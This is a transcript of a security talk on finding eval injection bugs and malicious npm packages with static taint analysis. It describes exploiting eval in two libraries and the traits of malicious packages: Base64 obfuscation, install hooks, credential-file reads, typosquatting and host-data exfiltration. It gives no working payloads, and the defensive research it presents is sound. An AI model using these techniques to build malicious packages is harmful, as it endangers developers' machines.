Hello guys, thank you for coming. Today I will be sharing how I found 19 malicious npm packages. First, a bit about me: my name is Kwan, and I'm a final-year CEG student. My interests are computer security, IoT and guitar music as well. In the summer I interned with Veracode, and this is the project that I did there. There are actually two employees at the back who are from Veracode and, yeah, they are hiring. Okay, so malicious packages. As you can see here, this is an npm advisory; some of you might be familiar with it. I found 19 malicious packages and reported them to npm. So by the end of the talk, you might want to discover some yourself and have your name in the npm hall of fame. So let's start. The contents I will cover are static analysis, what that is, and taint tracking, what that is. Then I will move on to how I did my scan for the eval function, which is kind of a dangerous function in JavaScript, and also my scan for malicious packages. So let's start with static analysis. Static analysis is a method of debugging based only on the code, and it can be used to detect bugs and vulnerabilities in a program. An example of a static analysis program is ESLint, yeah, very familiar. ESLint uses static analysis to find violations of the rules that you have configured, and if you think about it, ESLint can be used to detect vulnerabilities as well, because there are rules in ESLint that cover security. This is one such example, the rule that disallows eval. eval is a very dangerous function in JavaScript. It basically lets you execute a piece of code, and in this example it will execute object.x, which will result in foo. So ESLint is able to detect this call on its own, but is it able to tell whether this is a vulnerability? Well, this is not a vulnerability, because key is the literal x, so it's basically calling object.x.
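For readers without the slide, here is a minimal sketch of the kind of code being described. The names `obj` and `key` and the value `"foo"` are reconstructed from the spoken description and are assumptions, not the speaker's actual slide.

```javascript
// Hypothetical reconstruction of the slide example; all names are assumptions.
const obj = { x: "foo" };
const key = "x"; // a literal, not user input

// eval builds and runs the expression `obj.x`.
// ESLint's no-eval rule flags this call regardless of where `key` comes from.
const viaEval = eval("obj." + key);

// The same lookup without eval: bracket access never runs `key` as code.
const viaLookup = obj[key];

console.log(viaEval, viaLookup);
```

The lint rule only sees that eval is called. Deciding whether the call is exploitable depends on where `key` comes from, which the rule alone cannot tell.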
That's not a vulnerability, but if this key is user input then that might potentially lead to a vulnerability. So in order to find out whether or not key is user input, we use taint analysis. There are two main concepts in taint analysis. One is a source, the other is a sink. A source is basically where the data comes in, and a sink is where the data goes out. In this example there are five, six lines, and this is an example of code that is vulnerable to cross-site scripting. That means you can inject a script and it will be executed. So let's go through this example. a is request.getParameter. It basically tries to retrieve the GET parameter foo, and this is a source, because that is where the attacker or the user can put his input in. Then there is a bunch of assignments, for example b equals a, c equals b plus something, d equals c, and then e equals something with d, and then you move on to the sink. The sink here basically just writes e out to the browser or whatever is running this program. That is a sink because that is where the program produces its output. Taint analysis tries to evaluate whether this variable e is tainted by anything that can be input by the user. The way it does that is: e is tainted by d because of this statement, then it traces back, d is tainted by c, and so on and so forth, until it gets back to a. So the input of the user, which is a, directly affects the output, which is e, and that is how cross-site scripting is enabled in this case. There are many complications in taint analysis. It's not as simple as just looking at assignments, where whatever is on the other side of the assignment is what taints the variable. There might be multiple parameters, as in this case; there are multiple parameters in a big program. There might be different data structures that affect the taint analysis. In this case it is the hash map, which might affect the taint analysis.
And there are also a bunch of functions and objects, and most importantly in security, we care about sanitization methods. So is the input from the user sanitized anywhere between the source and the sink? Yeah. So that is basically what you need to know about static analysis and taint analysis. To do this, I use an algorithm for JavaScript to build the taint analysis. It's called approximate call graph, or you can call it ACG. This algorithm has been shown in papers to have high precision and, most importantly, it is very efficient. So I will explain how the algorithm works. Given a simple piece of code on the left, x equals a plus b and then an eval call, you have a representation on the right side, which is called the AST, the abstract syntax tree. For static analysis, people usually use this tree to do the analysis on the source code. Basically what ACG does is traverse this tree, and while it traverses the tree, it builds the taint graph. So I will explain. When it traverses down to this assignment, on the left you have x, and on the right side you have an arithmetic operation which includes a and b. That means x is tainted by a and b, which also means a and b taint x. After that, it travels back up and moves on to the next statement, and so on. That is how the algorithm basically works. It's basically traversing the tree. What I did to this algorithm is change it up a bit so that it's more suitable for the application of finding security bugs. Security bugs, especially dangerous functions like eval, do not occur frequently in source code. So it would be inefficient to scan all the libraries and build the call graph or the taint graph for every single library. You only want to build the taint graph for the libraries that have a dangerous function. And you only want to build the part of the graph that is related to that parameter, that variable alone.
So instead of going top down, that means starting from the program and traversing down the normal way, I do it from the bottom up. That means I first identify whether or not the dangerous function is there, and then from the dangerous function I trace back to the top of the tree. So let me explain again. It's the same piece of code, but now you know that the dangerous function is here, eval, and the variable is a. So what my algorithm does, instead of going from the program down, is just trace from a here. It traces up to the assignment operation, and then you know that a is tainted by a only. And that's all it's going to do. So basically it will only traverse this part of the tree instead of the whole program. Yes. So in the top-level view of what the algorithm does, it first traces all the variables in the node. That means it finds this eval and then traces whatever is inside this eval call. It tries to trace back what the source of this a is. How does it do that? By adding intra-procedural edges, adding inter-procedural edges, and then going back to tracing the variables in the node. Basically it's a loop, and it only stops when all the relevant nodes have been inspected. I will explain what intra-procedural and inter-procedural edges mean. Intra-procedural edges come from operations that happen only within that particular procedure itself. Some examples are these. If you have an assignment like a equals b, that means a is tainted by b, or b taints a. Another example is a equals b or c. That means b and c both taint a. So as I traverse the tree and arrive at some node, I inspect what kind of node it is, and then based on the type of node, following these rules, I add the relevant edges to the taint graph. The third column is a score. The score here is a score of confidence. That means if the score is zero, I have the utmost confidence that the edge is a correct edge.
And if the score is higher, then I have less confidence in that edge being correct. Right? A good example is a equals b or c. At runtime, you do not know in advance whether a will take the value of b or of c. So when I do static analysis, I just mark a as tainted by b and a as tainted by c at the same time. This is an overestimation, because at runtime a is tainted by only one of them, and that's why I increase the score. The purpose of the score is to keep the analysis as precise as possible, so that the scan is more efficient. So intra-procedural edges are quite simple to think about. What's more complicated is the inter-procedural edges. Those are the edges that are added across the program, which means there must be some kind of function call or something. In the case of a equals f(b) or new f(b), that means a is equal to some function call with the parameter b. There will be an edge from a, the variable, to b, the input to the function. And similarly, a will be tainted by the return value of f. You can see this is more complicated, because you have to draw an edge between the declaration of the function, which is stored somewhere in the code, and the actual call of the function, which is somewhere else in the code. Yeah. So these are the only operations that are needed in the algorithm. After the algorithm is run, what you have is a taint tree. Using the same example, the taint tree will be: x is tainted by a and b, or a and b taint x; y is tainted by a and b because of this; and a is tainted by itself because of this. Okay. So the taint tree is obtained, and I use this taint tree to find the vulnerabilities. I want to find all the vulnerabilities related to the eval function.
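The bottom-up tracing with confidence scores described above can be sketched roughly as follows. This is not the speaker's implementation and not the published ACG algorithm: it replaces the AST with a hypothetical flat list of assignment records, ignores statement order, and every name in it (`assignments`, `traceBack`, `req`, `fallback`) is an assumption made for illustration.

```javascript
// Each record means: `target` is assigned from `sources`.
// `score` is 0 for a certain edge and higher for an over-approximated one,
// such as `c = b || fallback`, where only one side is used at run time.
const assignments = [
  { target: "a", sources: ["req"], score: 0 },           // a = value read from the request
  { target: "b", sources: ["a"], score: 0 },             // b = a
  { target: "c", sources: ["b", "fallback"], score: 1 }, // c = b || fallback
  { target: "unrelated", sources: ["other"], score: 0 }, // never reaches the sink
];

// Start from the variable passed to the dangerous call and walk backwards,
// collecting only the edges that can influence it.
function traceBack(variable, assignments) {
  const edges = [];
  const seen = new Set();
  const worklist = [variable];
  while (worklist.length > 0) {
    const current = worklist.pop();
    if (seen.has(current)) continue; // avoids looping on cyclic assignments
    seen.add(current);
    for (const { target, sources, score } of assignments) {
      if (target !== current) continue;
      for (const source of sources) {
        edges.push({ from: source, to: target, score });
        worklist.push(source);
      }
    }
  }
  return edges;
}

// Pretend the sink is eval(c).
const taintEdges = traceBack("c", assignments);
const reachesUserInput = taintEdges.some((edge) => edge.from === "req");
console.log(taintEdges, reachesUserInput);
```

Because the walk starts at the sink, the `unrelated` assignment is never visited, which is the efficiency argument made in the talk.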
So using static analysis, I try to find all the occurrences of eval calls inside the code, identify what the argument of each eval call is, and find the taint graph of this argument. Yeah. This is done while I traverse the whole AST of the program. After finding the taint tree, I apply filters to it. That means: is there anywhere in the tree where there is a sanitization, or is there anywhere in the tree where a variable has a parameter as its source? I will explain this more. The sanitization filter: the purpose of this is to reduce false positives when finding vulnerabilities. For example, in this case we have eval of payload, and this payload is tainted by the variable request. Assume that the request comes from the user. It's easy to see that this can be a vulnerability, because payload is tainted by user input. However, in between there is a function called removeBlacklist, which can act as sanitization. That means the payload here will be safe to eval. Those are the cases that I want to filter out with the sanitization filter. The way I do this is by heuristic. That means any method whose name contains some kind of keyword, like sanitize, blacklist, whitelist or replace, I just consider to be a sanitization method. Yeah. The source type filter: in this example the eval function is here, and it is called on R0. R0 is something that is a literal and is not input by the user. In this case I would say that it is not a vulnerability because, well, it's not input by the user. Yeah. So using these two types of filters, with the tree as the input to the filters, I was able to scan and filter all the results. These are the results on a set of the top, I think top 1000 or something, libraries in npm that start with J.
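The two filters described above can be sketched as a pair of small predicates. The keyword list comes from the talk; the shape of a taint path (an ordered list of steps with a `kind` and a `name`) and the function names are assumptions made for this sketch, not the speaker's data model.

```javascript
// Keywords named in the talk for the name-based sanitizer heuristic.
const SANITIZER_KEYWORDS = ["sanitize", "blacklist", "whitelist", "replace"];

function looksLikeSanitizer(functionName) {
  const lower = functionName.toLowerCase();
  return SANITIZER_KEYWORDS.some((keyword) => lower.includes(keyword));
}

// `path` is a hypothetical list of steps from the origin of the data (index 0)
// to the argument of eval. A finding is kept only if no step looks like a
// sanitizer and the data does not originate from a literal.
function isCandidate(path) {
  const sanitized = path.some(
    (step) => step.kind === "call" && looksLikeSanitizer(step.name)
  );
  const fromLiteral = path[0].kind === "literal";
  return !sanitized && !fromLiteral;
}

const sanitizedPath = [
  { kind: "param", name: "request" },
  { kind: "call", name: "removeBlacklist" },
  { kind: "variable", name: "payload" },
];
const literalPath = [{ kind: "literal", name: "r0" }];
const rawPath = [
  { kind: "param", name: "request" },
  { kind: "variable", name: "payload" },
];

console.log(isCandidate(sanitizedPath)); // false: removeBlacklist matches "blacklist"
console.log(isCandidate(literalPath));   // false: the value is a literal
console.log(isCandidate(rawPath));       // true: user input reaches eval unfiltered
```

A name-based heuristic like this trades accuracy for speed: a function called `replaceAll` would be treated as a sanitizer even if it does nothing useful, which is why the remaining findings still need manual inspection.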
And the most important thing to take away here is that with no filters, that means with no taint analysis at all, there are about 180 libraries identified. But using taint analysis and all the filters, you can reduce that by three quarters. That means there are only about 45 libraries left. Yeah. And using this, I was able to find exploits for some of the libraries, which I will introduce here. Okay. So this library, what it simply does is convert data to a table. It provides a convenient method where you just input the data in this field, and then you have a table in HTML. Using static analysis, I was able to find that there is a way to execute code through this data field. You just escape it using this, and then you can basically execute any kind of code here. Here, for demonstration purposes, I just alert something like malicious. Yeah. Another example is here. This library, J2N, converts a string to an object. Again, using static analysis, I was able to construct a payload that will execute this piece of code. For demonstration purposes, I just set num equal to 666 and then console.log it, and you can see in the execution that, yeah, the console.log was executed. Yep. And that is it for the scan for dangerous eval calls. Next, I want to scan for malicious packages in npm. If you don't know, malicious packages have been very popular these days. It's one of the easier ways for attackers to run code in the user's website or whatever application the user is running. An example is this library: when it's installed, it runs an executable targeting Windows and uploads information to a remote server. So I want to find all these packages on npm. There are patterns that I recognize in these packages, and I use these patterns in my static analysis scan. So I will list five patterns here.
These malicious packages are often obfuscated with Base64 so that people who read the code cannot understand what it really does. They must be sending a request to a server or something, because that is what the attackers really want to do. Sometimes they attempt to read sensitive files like a password file or SSH files, and they usually run a script in the postinstall and preinstall fields in package.json. The code that is written in these fields, postinstall and preinstall, will automatically run in your environment when you install the npm package. And these packages are often typosquatted as well. That means they have like an extra X, or MongoDB without the correct... Yeah. So I did a scan using the same method, using the same static analysis, but without the taint analysis, because taint analysis is not really effective here. And I found a bunch of libraries with this malicious code. This malicious code basically sends the host name and whatever type of OS the environment is running to a server online. And it's a Chinese server. So yeah. And these are the libraries. I will go through the ways that these libraries execute the malicious code. There are four ways. The first way is that they can require the file in index.js. So when you require the library from another program, the library will automatically execute the malicious code. Another way is to include the code inside package.json, and the fields to include it in are, oops, it's pretty small, but yeah, I'll just tell you, the fields are install, postinstall or preinstall. These will automatically run the malicious code. Yeah. In conclusion, over the course of three months, I found 19 malicious packages and four libraries with a dangerous use of the eval function. And I think that any one of you can do the same thing. And I really think that security in open source libraries is very important.
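A rough sketch of checking a package for the patterns listed in this part of the talk. The speaker scanned with AST-based static analysis; this sketch substitutes simple regular expressions over the source text, so it is a stand-in technique rather than the method used. The function names, the signal labels, the thresholds and the example package are all assumptions.

```javascript
// npm lifecycle scripts that run automatically during `npm install`.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall"];

function installHooks(packageJson) {
  const scripts = packageJson.scripts || {};
  return LIFECYCLE_HOOKS
    .filter((hook) => typeof scripts[hook] === "string")
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// A long unbroken run of Base64 characters (threshold of 40 is arbitrary).
const BASE64_RUN = /[A-Za-z0-9+\/]{40,}={0,2}/;

function suspiciousSignals(packageJson, sourceText) {
  const signals = [];
  if (installHooks(packageJson).length > 0) signals.push("install-hook");
  if (BASE64_RUN.test(sourceText)) signals.push("base64-blob");
  if (/\/etc\/passwd|\.ssh\//.test(sourceText)) signals.push("sensitive-file");
  if (/require\(["'](https?|net|dns)["']\)/.test(sourceText)) signals.push("network");
  return signals;
}

// Hypothetical package that phones home with the host name on install.
const examplePackage = {
  name: "example-pkg",
  scripts: { postinstall: "node collect.js" },
};
const exampleSource =
  'const os = require("os"); const http = require("http"); ' +
  'http.get("http://example.invalid/?h=" + os.hostname());';

console.log(suspiciousSignals(examplePackage, exampleSource));
// -> [ 'install-hook', 'network' ]
```

None of these signals is malicious on its own, since many legitimate packages have install hooks or make network requests. A combination is only a reason to inspect the package by hand.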
And you know, for bug bounty programs, you usually need the skill of manual inspection. But for open source libraries, there's no way that you can inspect everything manually, because there are too many open source libraries. So static code analysis is probably the best way to find the vulnerabilities and keep open source libraries safe. Yes. And that's all. Yeah. If you have any questions about the project or about Veracode, you can ask the two guys. Can you raise your hands? What you are doing here is manual, right? Or do you plan to automate this? Well, the static analysis is not really manual. I mean, the manual part is writing the code. After the static analysis is run, it produces all the libraries that might potentially have vulnerabilities. Then I look at these libraries and do a manual inspection, because you can never trust 100% that there will be a vulnerability there. Yeah. And most importantly, when you try to submit these things to any kind of advisory, you need to come up with an exploit. If there's no exploit, they are going to ignore your post. I guess what you mean by automation is like, GitHub has, for example, git secure or something, which runs across different repositories. Oh, oh, yeah. Oops. Yeah. So there's actually an API on npm. I used the infrastructure built by Veracode to scan through all the libraries automatically. But if you don't have that access, you can use the API from npm to retrieve the library names, download a library to somewhere in S3 or on your computer, scan through it, delete it, and then do that again. Yeah. I just looked through the most popular ones. How would you tell that it is a whitelist or a blacklist? Well, I don't need to tell whether it's a whitelist or a blacklist method. How do you tell that it's a sanitization method? Yeah. So I use a heuristic, because there's no way that you can statically scan a method and know that the method is a sanitizing method.
So I just base it on the name of the method. Usually people would not use a user-defined method to sanitize the input. They would usually use some kind of sanitization library from npm to sanitize the input for them. Yeah. I think that you showed, right? How does it work? What would the graph for a recursive function look like? What does the graph for a recursive function look like? Hmm. I cannot draw it here. But when you traverse the tree, it's just DFS, and then you find something. While I am traversing the tree, I take note of all the locations that are related to the point down here. So when I find the variable here, I look through all the references to that variable and then use the same method to walk up the tree until the point where I don't want to walk anymore. Yeah. I mean, if you want to know the details, you can ask me later. Would we already be compromised if we install a malicious package, say because of a typo, but don't import it? Like, we never use it. Are we still compromised? It depends on how the malicious package is designed. If the malicious package has the malicious code inside the preinstall and postinstall scripts, then once you install it, like npm install some package, your environment is affected. Yeah. And the only way you can reverse that is to reinstall your whole environment. Yeah. But if the attacker is more kind, then the malicious code will only execute when you call some kind of function or when you require the library. By remaking your whole environment, do you mean like just npm install, or do you have to redo the whole thing? Well, because the npm package manager has the rights of the user who is running it, the attacker can basically install any backdoor anywhere on the computer. So yeah, by environment, I mean the whole machine. Yeah, unless you put it in a sandbox, that's correct.
So if you have like any more questions about details and stuff, you can approach me later. Yes. Thank you.